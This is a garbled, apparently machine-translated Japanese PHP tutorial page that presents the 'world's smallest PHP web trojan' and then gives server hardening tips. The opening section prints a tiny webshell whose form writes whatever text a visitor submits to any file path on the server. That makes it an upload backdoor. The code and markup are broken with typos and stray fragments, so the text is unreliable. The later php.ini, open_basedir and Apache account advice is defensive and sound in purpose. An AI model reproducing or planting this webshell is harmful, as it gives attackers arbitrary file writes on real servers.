$v) $_POST[$k] =tripslashes($v) ?>
ファイルを保存します。"/> $v) $_POST[$k] =tripslashes($v) ?> ファイルを保存します。">

ホームページ >バックエンド開発 >PHPチュートリアル >世界最小の PHP Web トロイの木馬 PHP トロイの木馬の防止方法を添付します。

世界最小の PHP Web トロイの木馬 PHP トロイの木馬の防止方法を添付します。

WBOY
WBOYオリジナル
2016-07-29 08:40:541134ブラウズ

php web Trojan

コードをコピー コードは次のとおりです:


header("content-Type: text/html; charset=gb2312")
if(get_magic_quotes_gpc()); ($_POST as $k=>$v) $_POST[$k] =tripslashes($v);

保存ファイル名:


textarea name= "text" COLS="70" ROWS="18" >





if(isset($_POST['file']))
{
$fp = @fopen($_POST['file'],'wb');
echo @fwrite ($fp,$_POST['text']) ? '保存に失敗しました!'
@fclose($fp)
?>


コードをコピーします

コードは次のとおりです:

PHP トロイの木馬を防ぐ方法PHP は、次のことを可能にするツールの 1 つです。動的な Web ページを生成できます。 PHP Web ファイルは通常の HTML Web ファイルとして扱われ、編集する場合は、HTML を編集する通常の方法で PHP を作成できます。

PHP はハイパーテキスト プリプロセッサ (PHP: Hypertext Preprocessor) の略で、PHP 公式サイト (http://www.php.net) から無料でダウンロードできます。 PHP は GNU Public License (GPL) に準拠しており、これに基づいて Linux や Emacs などの多くの人気ソフトウェアが誕生しました。 PHP は、ほとんどの Unix プラットフォーム、GUN/Linux、および Microsoft Windows プラットフォームで実行できます。 Windows PC または Unix マシンに PHP をインストールする方法については、PHP 公式サイトを参照してください。インストールプロセスは簡単です。 PHP のもう 1 つの利点は、そのセキュリティです。PHP の誕生により、ASP とは異なり、セキュリティの設定が非常に簡単になるため、ネットワーク セキュリティがますます注目されるようになりました。多くの手順を実行し、多くのサービスを無効にします。ただし、どんなに優れたものであっても、PHP がデフォルトで設定されている場合、脆弱性が常に存在します。そのため、この記事では、スクリプト トロイの木馬の破壊を防ぐために PHP のセキュリティ面を設定する方法について説明します。

1. php トロイの木馬が Webshel​​l を実行しないようにします。
safe_mode を開き、php.ini で disable_functi を設定します。どちらかまたは両方を選択できます。
2. Web ディレクトリからの飛び出しを防ぐ

まず httpd.conf を変更します。php スクリプト プログラムを Web ディレクトリ内でのみ動作させる場合は、httpd.conf ファイルを変更して php の動作パスを制限することもできます。たとえば、Web ディレクトリが /usr/local/apache/htdocs の場合、スクリプトが /usr/local/apache/ を読み取る必要がある場合は、次の行を httpd.conf に追加します: php_admin_value open_basedir /usr/local/apache/htdocs htdocs これ以外のファイルは許可されません。開くときに次のようなエラー メッセージが表示されます。「警告: ファイルが /usr/local/apache/htdocs/open の間違ったディレクトリにあります。」 .php の 4 行目など。
3. PHP トロイの木馬によるファイル ディレクトリの読み書きを防ぐ
php.ini の disable_functi の後に PHP ファイル処理関数を追加します。主に fopen、mkdir、rmdir、chmod、unlink、dir、fopen、fread、fclose、fwrite、file_exists 、closedir、 is_dir、readdir.opendir、fileperms.copy、リンク解除、delfile。つまり、disable_functi、fopen、mkdir、rmdir、chmod、unlink、dir、fopen、fread、fclose、fwrite、file_exists、closedir、is_dir、readdir.opendir、fileperms.copy、unlink、delfile です。
OK、完了しました。PHP トロイの木馬は私たちとは何の関係もありません。残念ながら、この場合、テキスト データベースを使用するものは機能しなくなります。 Apache が Windos プラットフォーム上に構築されている場合は、それに注意する必要があります。デフォルトでは、Apache は次のようにシステム権限で実行されます。
net user apache f**kmicrosoft /add
net localgroup users apache /del
この時点では、どのグループにも属さないユーザー apche を作成します。コンピューターマネージャー-サービス-Apache サービスのプロパティ-ログオン-このアカウントを開き、ここで上記で作成したアカウントとパスワードを入力して再起動します。 Apache サービスは、低い権限での Apache 操作を実現します。
要約: 実際、各フォルダーのアクセス許可を設定し、読み取りと書き込みができる個別のユーザーをディレクトリごとに作成することによってもセキュリティを実現できます。現在、多くの仮想ホスティングプロバイダーで一般的な構成方法ですが、この方法はこれを防ぐには過剰です。管理者がセキュリティ意識を持っている限り、未使用の機能を相対的にブロックすることで、ネットワーク セキュリティの脅威を防ぐことができます。
以下は、一部の Web トロイの木馬によるファイルの生成などを防ぐための mcafee のセキュリティ設定です。
http://www.jb51.net/hack/list461_1.html
上記では、世界最小の PHP Web トロイの木馬と、関連するコンテンツを含む PHP トロイの木馬の防止方法を紹介しました。PHP チュートリアルに興味のある友人に役立つことを願っています。


声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。